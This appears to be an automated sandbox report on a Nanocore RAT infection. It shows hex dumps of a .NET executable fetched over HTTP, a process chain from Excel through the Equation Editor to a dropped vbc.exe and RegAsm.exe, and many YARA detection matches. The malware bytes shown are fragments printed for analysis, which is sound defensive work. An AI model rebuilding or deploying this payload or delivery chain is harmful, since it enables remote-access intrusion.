                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f ed bf 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 0a 00 00 0a 01 00 00 00 00 00 9e 47 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 47 0a 00 4b 00 00 00 00 60 0a 00 60 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 27 0a 00 00 20 00 00 00 28 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 07 01 00 00 60 0a 00 00 08 01 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 32 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 47 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 53 00 00 20 3b 00 00 03 00 00 00 0d 00 00 06 10 8f 00 00 32 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 7d 00 00 00 29 00 00 00 05 00 00 00 49 00 00 00 88 00 00 00 38 78 00 00 00 28 04 00 00 06 38 00 00 00 00 38 74 00 00 00 20 04 00 00 00 7e 87 00 00 04 39 c4 ff ff ff 26 38 ba ff ff ff 18 3a 34 00 00 00 20 00 00 00 00 7e 61 00 00 04 3a a9 ff ff ff 26 20 00 00 00 00 38 9e ff ff ff 38 2f 00 00 00 20 02 00 00 00 7e 7b 00 00 04 3a 8a ff ff ff 26 38 80 ff ff ff 28 03 00 00 06 20 03 00 00 00 7e 2a 00 00 04 39 70 ff ff ff 26 38 66 ff ff ff 1d 3a 82 ff ff ff 38 01 00 00 00 2a 38 fa ff ff ff 38 d0 ff ff ff 00 00 06 2a 00 00 1e 00 28 02 00 00 06 2a 1e 00 28 30 00 00 06 2a 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 13 30 04 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 20 00 00 00 00 7e 21 00 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 db ff ff ff fe 0c 00 00 45 02 00 00 00 20 00 00 00 05 00 00 00 38 1b 00 00 00 2a 38 fa ff ff ff 20 01 00 00 00 7e 71 00 00 04 3a d9 ff ff ff 26 38 cf ff ff ff 02 03 16 39 0c 00 00 00 26 26 38 00 00 00 00 38 d1 ff ff ff 7d 03 00 00 04 38 c8 ff ff ff 7e 02 16 1d 39 05 00 00 00 38 0b 00 00 00 26 7b 03 00 00 04 38 06 00 00 00 26 38 f0 ff ff ff 2a 7e 02 1b 1a 39 05 00 00 00 38 0b 00
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`(G `@ @PGK`` H.text' ( `.rsrc``*@@.reloc2@BGHS ;20 8E})I8x(88t ~9&8:4 ~a:& 88/ ~{:&8( ~*9p&8f:8*88*(*(0*&~*~*0t( ~!:& 88E 8*8 ~q:&89&&88}8~98&{8&8*~98
                                                                  Jun 9, 2021 08:04:57.205605984 CEST3INData Raw: 00 00 26 7b 04 00 00 04 38 06 00 00 00 26 38 f0 ff ff ff 2a 13 30 04 00 80 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 03 00 00 00 4e 00 00 00 25 00 00 00 05 00 00 00 38 49 00 00 00 2a 38 fa ff ff ff 20 00 00 00
                                                                  Data Ascii: &{8&8*0 8EN%8I*8 ~:& 8:8!&& ~:& 88}8&~*~*0X8*s%~%98-&~s%9
                                                                  Jun 9, 2021 08:04:57.205631018 CEST4INData Raw: 00 00 00 00 fe 0c 03 00 45 05 00 00 00 01 02 00 00 d8 01 00 00 42 02 00 00 cb 01 00 00 f5 01 00 00 38 fc 01 00 00 00 73 0b 00 00 0a 13 00 38 00 00 00 00 00 11 00 20 00 01 00 00 28 1e 00 00 06 20 00 00 00 00 7e 5a 00 00 04 3a 0f 00 00 00 26 20 02
                                                                  Data Ascii: EB8s8 ( ~Z:& 8E&!88!( [o(!8\io ~ :& 8E8o8(%8
                                                                  Jun 9, 2021 08:04:57.205655098 CEST6INData Raw: 2a 00 00 00 26 38 6d ff ff ff 38 0a 00 00 00 20 03 00 00 00 38 3c ff ff ff 73 21 00 00 0a 80 0f 00 00 04 38 8a ff ff ff 2a 38 fa ff ff ff 80 0c 00 00 04 20 04 00 00 00 7e 7b 00 00 04 3a 13 ff ff ff 26 20 04 00 00 00 38 08 ff ff ff 38 25 ff ff ff
                                                                  Data Ascii: *&8m8 8<s!8*8 ~{:& 88%887 ~4:&80| 8E-8(:%&:0 ~5:& 88&88rp*:&
                                                                  Jun 9, 2021 08:04:57.205681086 CEST7INData Raw: 00 dc 20 00 00 00 00 7e 35 00 00 04 39 6f fe ff ff 26 38 65 fe ff ff 11 05 02 28 3a 00 00 06 2a 11 04 2a 38 bb fe ff ff 20 05 00 00 00 38 4e fe ff ff 38 10 00 00 00 13 05 20 03 00 00 00 fe 0e 02 00 38 35 fe ff ff 11 05 02 28 3a 00 00 06 15 39 05
                                                                  Data Ascii: ~59o&8e(:**8 8N8 85(:98& 88y8qLuY;0K:&:&o+9+8&8&8:&(+8&8**0
                                                                  Jun 9, 2021 08:04:57.205705881 CEST8INData Raw: 38 04 00 00 00 fe 0c 02 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 11 05 28 38 00 00 0a 38 00 00 00 00 dc 20 05 00 00 00 7e 69 00 00 04 3a 32 fd ff ff 26 20 06 00 00 00 38 27 fd ff ff 11 01 14 28 3f 00 00 06 3a 8a fd ff ff 20 00 00 00 00 7e 46
                                                                  Data Ascii: 8E8(88 ~i:2& 8'(?: ~F9& 8(>9r 88 ~M9&88&8P@K@0_8E8*(9@
                                                                  Jun 9, 2021 08:04:57.205732107 CEST10INData Raw: 00 00 00 26 28 03 00 00 0a 20 00 00 00 00 7e 2e 00 00 04 39 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 ce ff ff ff fe 0c 00 00 45 01 00 00 00 06 00 00 00 38 01 00 00 00 2a 38 fa ff ff ff 26 38 be ff ff ff 38 ef ff ff ff 00 00 00 06 2a 00 00
                                                                  Data Ascii: &( ~.9& 88E8*8&88**&~*~*0P:=&( ~{:& 88E8*8&88**&~*~*0K:8
                                                                  Jun 9, 2021 08:04:57.205756903 CEST11INData Raw: 04 00 00 b6 04 00 00 96 05 00 00 46 07 00 00 4a 0c 00 00 98 06 00 00 75 05 00 00 8d 0e 00 00 19 06 00 00 38 03 00 00 8f 04 00 00 f3 02 00 00 8e 08 00 00 4f 0d 00 00 53 09 00 00 fd 03 00 00 ad 0e 00 00 c1 07 00 00 8c 00 00 00 73 08 00 00 96 09 00
                                                                  Data Ascii: FJu8OSsb's0 NzLLYG&%of`
                                                                  Jun 9, 2021 08:04:57.205785036 CEST13INData Raw: 06 61 20 da f7 aa b5 61 80 32 00 00 04 20 05 00 00 00 28 81 00 00 06 3a 60 fa ff ff 26 20 01 00 00 00 38 55 fa ff ff 20 e4 d3 3a 6d 20 01 00 00 00 62 20 4a 8b 31 2e 59 20 e1 81 e1 98 61 80 68 00 00 04 38 6d 03 00 00 20 40 f3 91 f8 20 5d 8a 1c 05
                                                                  Data Ascii: a a2 (:`& 8U :m b J1.Y ah8m @ ]Y huaj /8 #fe ra (:&8 #f lYf @A0a8: [X v:Y va08s 6 KY>Y a8A [X
                                                                  Jun 9, 2021 08:04:57.205809116 CEST14INData Raw: 41 00 00 04 20 21 00 00 00 28 82 00 00 06 39 2f f5 ff ff 26 38 25 f5 ff ff 20 0b 6f 49 d8 65 66 20 0a 6f 49 d8 61 80 6e 00 00 04 20 24 00 00 00 38 0d f5 ff ff 20 76 89 38 f9 65 20 0c 36 11 5f 61 80 8d 00 00 04 20 23 00 00 00 38 f2 f4 ff ff 20 50
                                                                  Data Ascii: A !(9/&8% oIef oIan $8 v8e 6_a #8 P_f c k(a58M c a_8 Z c qa dXa^8 e 0Oaw (:z& 8o XAc X sa#8 f
                                                                  Jun 9, 2021 08:04:57.342072964 CEST16INData Raw: 55 7c 61 80 9a 00 00 04 20 2d 00 00 00 38 f6 ef ff ff 20 2d e7 26 81 20 71 13 7f 24 58 20 05 00 00 00 63 20 d4 2f 2d fd 61 80 42 00 00 04 20 33 00 00 00 38 d0 ef ff ff 20 c3 e9 4a af 66 20 eb 46 84 74 61 80 2d 00 00 04 20 38 00 00 00 38 b5 ef ff
                                                                  Data Ascii: U|a -8 -& q$X c /-aB 38 Jf Fta- 88 -bte b %wa~ "(:&8 = b z=a68 rx5ef a8 Xm* b c Xm*aR 81 Q;? U{ae ~a: .


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:08:04:44
                                                                  Start date:09/06/2021
                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                  Imagebase:0x13f3b0000
                                                                  File size:27641504 bytes
                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:08:05:07
                                                                  Start date:09/06/2021
                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                  Imagebase:0x400000
                                                                  File size:543304 bytes
                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:08:05:09
                                                                  Start date:09/06/2021
                                                                  Path:C:\Users\Public\vbc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                  Imagebase:0xdf0000
                                                                  File size:734208 bytes
                                                                  MD5 hash:EB43B3C033BD76B51B90A51A6726A81C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 30%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Start time:08:05:36
                                                                  Start date:09/06/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  Imagebase:0x3c0000
                                                                  File size:64672 bytes
                                                                  MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Antivirus matches:
                                                                  • Detection: 0%, Metadefender, Browse
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:moderate

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TVCm
                                                                    • API String ID: 0-3847034056
                                                                    • Opcode ID: 617a8248d4d521ac9360dc2035e52397cf9c03dad33d051dc440e3c35e4211e2
                                                                    • Instruction ID: c1a4e43004d5c6187a458be9e69bbc49b83afbf6096fc1c6faa766768f8f2927
                                                                    • Opcode Fuzzy Hash: 617a8248d4d521ac9360dc2035e52397cf9c03dad33d051dc440e3c35e4211e2
                                                                    • Instruction Fuzzy Hash: E4B2D875A00228CFDB64CF69C984BD9BBB2FF89304F1581E9D509AB265D731AE91CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,?,?), ref: 004376BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID:
                                                                    • API String ID: 3555792229-0
                                                                    • Opcode ID: 8da17c6d8b57544aa0a777f8d3749c028a5d8dcfa5310323d29207bb7e6966df
                                                                    • Instruction ID: b0d21401ef70752963a4809b7097b5fcdf24a935a59f89c96511d8b845cf2810
                                                                    • Opcode Fuzzy Hash: 8da17c6d8b57544aa0a777f8d3749c028a5d8dcfa5310323d29207bb7e6966df
                                                                    • Instruction Fuzzy Hash: 5E11CDB9D052089FCF10CFA8E444AEDFBF1AB09314F24A45AE454B7250C339AA45CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LCDm
                                                                    • API String ID: 0-625777892
                                                                    • Opcode ID: 946546d519bd82ef75f4c821e1aefa422062ee378d75e60ab54f8074ac9cb1cd
                                                                    • Instruction ID: d5c44bb0a2ac4aa118e2271a54ff8650b3468e9f804c54707edbf8fbf98982ae
                                                                    • Opcode Fuzzy Hash: 946546d519bd82ef75f4c821e1aefa422062ee378d75e60ab54f8074ac9cb1cd
                                                                    • Instruction Fuzzy Hash: 95A16EB0E2820CCFDB00DFA5E54879EBBF1AB59304F10D95AD02967694E7B829C8DF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b4fc407b0d3ed6f390673e2e5c0e65006a34c300d37e2b4fd3139c3d5ba7684
                                                                    • Instruction ID: 935b06f5fc32a79e01be968544c46141304aa6c0c574a5ad2495b8cae03d0e96
                                                                    • Opcode Fuzzy Hash: 9b4fc407b0d3ed6f390673e2e5c0e65006a34c300d37e2b4fd3139c3d5ba7684
                                                                    • Instruction Fuzzy Hash: 6BA1D274905228CFDB64CF24D8987EABBB1BB49300F10A1DAD44EA3291DB785EC5DF09
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a48e2d2cac7f31f1967e79222a329dc7f444f8f9e256cd339720740575bceeb
                                                                    • Instruction ID: 0422e184930d44aac9d55241c377ae992049da66d6b61fcdb12720f38d78ffdf
                                                                    • Opcode Fuzzy Hash: 5a48e2d2cac7f31f1967e79222a329dc7f444f8f9e256cd339720740575bceeb
                                                                    • Instruction Fuzzy Hash: B22149B8D04219DFCB14CFA9D8859AEFBF1BB49320F14A16AE815B7360D734A941CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00435E77
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: a7f9f18968aa218441bb82024096f6bddb3eb718ed652c2fb5b6994389a7ab6c
                                                                    • Instruction ID: ee016a89a2a562fa2beecea38c666cc4dbf897cded636dfa22a87fdbda96c229
                                                                    • Opcode Fuzzy Hash: a7f9f18968aa218441bb82024096f6bddb3eb718ed652c2fb5b6994389a7ab6c
                                                                    • Instruction Fuzzy Hash: BEC11471D0022D8FDB20CFA4C945BEEBBB1BF09304F1095AAE859B7250DB749A85CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00435E77
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 42949be11def879ba56c8761433f973f128fdee9fc1af42999b08a90c89509f8
                                                                    • Instruction ID: c214bef79a81365bc41f7a9c2ea7ea931b68e53e6bde225ff31058397431d19d
                                                                    • Opcode Fuzzy Hash: 42949be11def879ba56c8761433f973f128fdee9fc1af42999b08a90c89509f8
                                                                    • Instruction Fuzzy Hash: 47C11571D0022D8FDB20CFA4C945BEEBBB1BF09304F1095AAE859B7250DB749A85CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00436EB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                    Similarity
                                                                    • API ID: BaseModuleName
                                                                    • String ID:
                                                                    • API String ID: 595626670-0
                                                                    • Opcode ID: 2518429ca6266794ee52893e99aaea1b1b3a4a921154cdb6e7d65e68c2f32d31
                                                                    • Instruction ID: 97dab9aa8aed1c142b4baa2e1c0e476f6f4dafe8f01cf2899015176f404dfb1c
                                                                    • Opcode Fuzzy Hash: 2518429ca6266794ee52893e99aaea1b1b3a4a921154cdb6e7d65e68c2f32d31
                                                                    • Instruction Fuzzy Hash: DF61BD74D04219AFCB14CFA9D985B9EFBF1BB49304F20912AE818AB350DB74A945CF94
                                                                    Uniqueness

